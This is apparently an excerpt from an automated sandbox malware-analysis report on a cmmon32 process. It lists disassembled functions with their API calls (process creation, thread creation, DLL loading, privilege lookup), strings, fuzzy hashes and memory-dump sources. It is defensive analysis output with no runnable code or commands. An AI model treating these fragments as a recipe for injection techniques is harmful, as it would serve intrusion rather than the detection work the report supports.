                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction ID: 019123e20ccd87f7d5c491a181bbed2e04602a47ea49ca5c1c1a9f937d0297b9
                                                          • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction Fuzzy Hash: AE01A231A8022977EB20A6949C06FBE776D6B41F54F140259FF04BB1C1E6A4AA064AF6
                                                          Function 02C9ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C9AD52
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: f19f1478740ae848c21815405bc7e461237aa72ef58682041db4a123a626d494
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: 37015EB6D4020EABDF10EAE4DC45FDDB7789B54308F004195E90997240FA30EB04CB91
                                                          Function 02CAA6CD Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CAA724
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 9b17c3caf47f0b2d3f1ea9c2e8431204d3731970021334b4937623a45c5b5e40
                                                          • Instruction ID: 3de07ef434d9d1224999f7e24d83f5ae8f159d7e2c0717fbeff8ec3633750e19
                                                          • Opcode Fuzzy Hash: 9b17c3caf47f0b2d3f1ea9c2e8431204d3731970021334b4937623a45c5b5e40
                                                          • Instruction Fuzzy Hash: 4001EFB2210108AFCB58CF88DC90EEB37ADAF8C354F118208FA0D97240C630E841CBA0
                                                          Function 02CAA6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CAA724
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 3a9beb3fe225e62a853b17ce798dbfeb69c4d879d5ab56100dff236bd6f2abeb
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: 9B01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                          Function 02CA91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02C9F040,?,?,00000000), ref: 02CA91DC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                                          • Instruction ID: ac7bb321c891e9a584179d580c05d8c8c7b8f522a43cc2652aca10034ca694cf
                                                          • Opcode Fuzzy Hash: 31c5d0ee231ec7bfd250f3fa6c59ac425944430061f7801c93529314b70287fd
                                                          • Instruction Fuzzy Hash: 09E092333903143AE3306599EC02FA7B39DCB81B24F14002AFB0DEB2C0D5A6F50146A4
                                                          Function 02CAA7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C9F1C2,02C9F1C2,?,00000000,?,?), ref: 02CAA7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 2c43ef0d90ee0710a0c26dba97b15eb05575ff5be2cfcea22de70c7112e336c1
                                                          • Instruction ID: 4223d859b47833e9fda4e4b568ba2a0fa88b7031b3bcca20d506e2eb9611a051
                                                          • Opcode Fuzzy Hash: 2c43ef0d90ee0710a0c26dba97b15eb05575ff5be2cfcea22de70c7112e336c1
                                                          • Instruction Fuzzy Hash: 0EE0EDB6200205AFDB20DF98CC80ED777AD9F89240F108254FA0C9B201D931E8108BF0
                                                          Function 02CAA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(02CA4526,?,02CA4C9F,02CA4C9F,?,02CA4526,?,?,?,?,?,00000000,00000000,?), ref: 02CAA64D
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: e4e83f468cbdaf11fe9506299e8de1e7d4f86e04e39a42f99715ef7239d9fe17
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 30E012B2200208ABDB18EF99CC40EA777ADAF88654F118558BA1C5B241C631F910CAB0
                                                          Function 02CAA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C9F1C2,02C9F1C2,?,00000000,?,?), ref: 02CAA7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: e91c5d078946212342c912d3d2f84effa7412da1a2f36563dcbb464b25b80366
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: D4E01AB12002086BDB14DF49CC84EE737ADAF88654F018154BA0C57241C931E8108BF5
                                                          Function 02C9F6B7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,02C98D14,?), ref: 02C9F6EB
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: aa0f76243faf6908f4d8fc8ff513ac5e9a7c89ee674470b3e7ce3c4df52cae0e
                                                          • Instruction ID: f2a69f37ef7e18d6fe15a38c1e8ff356170385a5f2090559949989c6dec751d7
                                                          • Opcode Fuzzy Hash: aa0f76243faf6908f4d8fc8ff513ac5e9a7c89ee674470b3e7ce3c4df52cae0e
                                                          • Instruction Fuzzy Hash: 55E0C2E11683812AFB10FBB49C06B476B440B06328F4A04A8954CEF0C7C54891149636
                                                          Function 02C9F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,02C98D14,?), ref: 02C9F6EB
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction ID: d8caa9a96a87cdca77911945337594e645205ecf5a30ef234d1347cd98491ac1
                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction Fuzzy Hash: ADD0A7727503043BEA10FAA49C07F2773CD5B44B04F490074F948D73C3DA54F1004565
                                                          Function 04C32C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 53fe94e9e24568b820cfbfcafedd1a2b4f8ddaaddf41d56bd69eedf14e6d72c2
                                                          • Instruction ID: 7b8a5b865166ac48034f65e6b780764f1b1dfb8c5bb3088d204e5ac90d94c173
                                                          • Opcode Fuzzy Hash: 53fe94e9e24568b820cfbfcafedd1a2b4f8ddaaddf41d56bd69eedf14e6d72c2
                                                          • Instruction Fuzzy Hash: D1B09B759015C5C5FF11F760570871779016BD0B05F15C071D2030645F4778E1D1E1B5

                                                          Non-executed Functions

                                                          Function 00337020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00337156,00331000), ref: 00337027
                                                          • UnhandledExceptionFilter.KERNEL32(Vq3,?,00337156,00331000), ref: 00337030
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,00337156,00331000), ref: 0033703B
                                                          • TerminateProcess.KERNEL32(00000000,?,00337156,00331000), ref: 00337042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID: Vq3
                                                          • API String ID: 3231755760-512008881
                                                          • Opcode ID: 057d9876da3629ca2a39f8f738088cb184a5ec67a7e271f0d1b2b68bd8ac4729
                                                          • Instruction ID: 22c5d7fae0abab770f778bca47b00239d2ca5b193da38cbe7c7b573d8194031c
                                                          • Opcode Fuzzy Hash: 057d9876da3629ca2a39f8f738088cb184a5ec67a7e271f0d1b2b68bd8ac4729
                                                          • Instruction Fuzzy Hash: 75D0C932004604EBDB062BF1FD8CB893F2DEB88322F044002F71A82020CAB244018B61
                                                          Function 00333B12 Relevance: 72.1, APIs: 25, Strings: 16, Instructions: 311stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ??0CmLogFile@@QAE@XZ.CMUTIL ref: 00333B1F
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL ref: 00333BE0
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL(00000000,00000000,00000000,00000000,00000000), ref: 00333BF1
                                                          • ??0CIniW@@QAE@PAUHINSTANCE__@@PBG111@Z.CMUTIL(00000000,00000000,00000000,00000000,00000000), ref: 00333C02
                                                          • GetTickCount.KERNEL32 ref: 00333C29
                                                          • ?GetPrimaryRegPath@CIniW@@QBEPBGXZ.CMUTIL(?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CE6
                                                          • CmStrCpyAllocW.CMUTIL(00000000,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CED
                                                          • lstrlenW.KERNEL32(?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333CFD
                                                          • lstrlenW.KERNEL32(00331408,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D09
                                                          • CmMalloc.CMUTIL(?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D18
                                                          • ?SetPrimaryRegPath@CIniW@@QAEXPBG@Z.CMUTIL(00000000,?,?,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D55
                                                          • CmFree.CMUTIL(00000000,?,?,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D5C
                                                          • ?Init@CmLogFile@@QAEJPAUHINSTANCE__@@HPBG@Z.CMUTIL(00331408,?,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D74
                                                          • ?GPPB@CIniW@@QBEHPBG0H@Z.CMUTIL(Connection Manager,EnableLogging,00000001,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333D8C
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Logging,MaxFileSize,00000064,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DA6
                                                          • ?GPPS@CIniW@@QBEPAGPBG00@Z.CMUTIL(Logging,FileDirectory,%Temp%,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DC3
                                                          • ?SetParams@CmLogFile@@QAEJHKPBG@Z.CMUTIL(00000000,00000000,00000000,?,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333DD1
                                                          • ?Start@CmLogFile@@QAEJH@Z.CMUTIL(00000000), ref: 00333DE1
                                                          • ?Stop@CmLogFile@@QAEJXZ.CMUTIL ref: 00333DE9
                                                          • CmFree.CMUTIL(?), ref: 00333DF2
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Connection Manager,IdleTimeout,0000000A), ref: 00333E0C
                                                          • ?SetPrimaryRegPath@CIniW@@QAEXPBG@Z.CMUTIL(?), ref: 00333E1F
                                                          • CmFree.CMUTIL(?), ref: 00333E26
                                                          • ?GPPI@CIniW@@QBEKPBG0K@Z.CMUTIL(Connection Manager,IdleThreshold,00000000,?,CCmConnection::CCmConnection set m_fGlobalGlobal to %d,00000000,?), ref: 00333EFB
                                                          • memset.MSVCRT ref: 00333F26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: File@@$E__@@$FreeG111@Path@Primary$lstrlen$AllocCountG00@Init@MallocParams@Start@Stop@Tickmemset
                                                          • String ID: %Temp%$%s%s$CCmConnection::CCmConnection set m_fGlobalGlobal to %d$CConnStatistics::OpenByStatisticsApi() hTunnel is 0x%x and hDial is 0x%x$Connection Manager$EnableLogging$FileDirectory$IdleThreshold$IdleTimeout$Logging$MaxFileSize$Process 0x%x added to watch list$SOFTWARE\Microsoft\Connection Manager\SingleUserInfo\$SOFTWARE\Microsoft\Connection Manager\UserInfo\$Storing dial-up handle 0x%x$Storing tunnel handle 0x%x
                                                          • API String ID: 2997560287-1460102517
                                                          • Opcode ID: 8b02a15480f7a540bf1df8a3913bf04ee24aaaf4487d987743870ff8ca339e02
                                                          • Instruction ID: 117e0078a6bef2e0dbb1e1f62c4402ca338d82181eddbeec8cdf929a142932da
                                                          • Opcode Fuzzy Hash: 8b02a15480f7a540bf1df8a3913bf04ee24aaaf4487d987743870ff8ca339e02
                                                          • Instruction Fuzzy Hash: 68D15EB1901311EFDB128F54C8C9BD97BA9FF49710F0881BAED09AF256DBB09540CBA0
                                                          Function 00334423 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 152windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033448B
                                                          • IsWindowVisible.USER32(?), ref: 003344B1
                                                          • GetTickCount.KERNEL32 ref: 003344BE
                                                          • GetTickCount.KERNEL32 ref: 003344CD
                                                          • MsgWaitForMultipleObjects.USER32(00000000,?,00000000,00000000,000004FF), ref: 0033454B
                                                          • GetLastError.KERNEL32 ref: 003345B8
                                                          Strings
                                                          • MsgWaitForMultipleObjects failed, LastError:%d, xrefs: 003345BF
                                                          • CCmConnection::StateConnectedGetEvent() - m_hEventRasNotify && ahObjectsToWait[dwRes - WAIT_OBJECT_0] == m_hEventRasNotify, xrefs: 003345DE
                                                          • MsgWaitForMultipleObjects returns %d, xrefs: 003345C7
                                                          • CCmConnection::StateConnectedGetEvent() - m_WatchProcess.IsIdle(), xrefs: 0033458A
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                          • Associated: 0000000E.00000002.3714532226.0000000000339000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_330000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: CountTick$ErrorLastMessageMultipleObjectsPeekVisibleWaitWindow
                                                          • String ID: CCmConnection::StateConnectedGetEvent() - m_WatchProcess.IsIdle()$CCmConnection::StateConnectedGetEvent() - m_hEventRasNotify && ahObjectsToWait[dwRes - WAIT_OBJECT_0] == m_hEventRasNotify$MsgWaitForMultipleObjects failed, LastError:%d$MsgWaitForMultipleObjects returns %d
                                                          • API String ID: 1792462035-3812601745
                                                          • Opcode ID: 8cd13f821d7f7545887d5597da23ece2e0d71317acad277783ea2ce6d3ba8257
                                                          • Instruction ID: c53aef44acdff47f298755b417ab96ded2e7f70c86795e55c8b2b262a7025cba
                                                          • Opcode Fuzzy Hash: 8cd13f821d7f7545887d5597da23ece2e0d71317acad277783ea2ce6d3ba8257
                                                          • Instruction Fuzzy Hash: 3051B271A00205DBEF26DFA6D8C9BAE77ACFF85311F150639F562D2190DB71A940CB21
                                                          Function 04C32890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 89d290979a43a2e71cbcf5c827d67b0b28fc1825df42e977095bdc5518a306f7
                                                          • Instruction ID: c2ff8ceb4d3e62537af315d4aab518dc8040df3c6793e231d4879763629a05e8
                                                          • Opcode Fuzzy Hash: 89d290979a43a2e71cbcf5c827d67b0b28fc1825df42e977095bdc5518a306f7
                                                          • Instruction Fuzzy Hash: 6651E6B2A00216BFDF20DF9998D097EF7BABB49205714C1A9E465D7641E334FF409BA0
                                                          Function 04CA2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: c864e832d73044f12ca6bfcc2b959180e235cecbfaa5f5be2c4ef3407d325def
                                                          • Instruction ID: 9e7da55d4aef2a651974aa62fec895e1bbfe682e99bcdae3dba4621413ecb0b8
                                                          • Opcode Fuzzy Hash: c864e832d73044f12ca6bfcc2b959180e235cecbfaa5f5be2c4ef3407d325def
                                                          • Instruction Fuzzy Hash: 5D512671A00666AFDB30DF9DC89097FB7FAEB84208B048499E496D7741E674FB109B60
                                                          Function 04C27630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C646FC
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C64725
                                                          • Execute=1, xrefs: 04C64713
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C64787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C64742
                                                          • ExecuteOptions, xrefs: 04C646A0
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C64655
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: e91f6dcf5169f3859307b1a73203d1e5fea396ca181ff5ffe658509d8444f547
                                                          • Instruction ID: 50a7db4265d9cd8cc68e10592f60c610bc72f178f2478dbedc9941386aa697a1
                                                          • Opcode Fuzzy Hash: e91f6dcf5169f3859307b1a73203d1e5fea396ca181ff5ffe658509d8444f547
                                                          • Instruction Fuzzy Hash: 1F5137316012296BEF11EBA9DDC9BA937AAEF04704F0400E9D506AB190EBB0BF45DF54
                                                          Function 04CC6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: a9df5d1436904bc7e66a86189bff3dd05a7ca58de099182b06eada805b1ffecf
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: F4021571608341AFD315CF28C994A6FBBE6EFC8704F04892DF9898B264DB31E945DB52
                                                          Function 04C3B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 705d5167dfab8ae1a09735e4f148e0449346404bd45fd4984275c0bbc0c474c0
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 9681C270E052499EDF288E68C8917FEBBB3EF45312F18411AD851A7293E734BE40CB61
                                                          Function 04CA20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
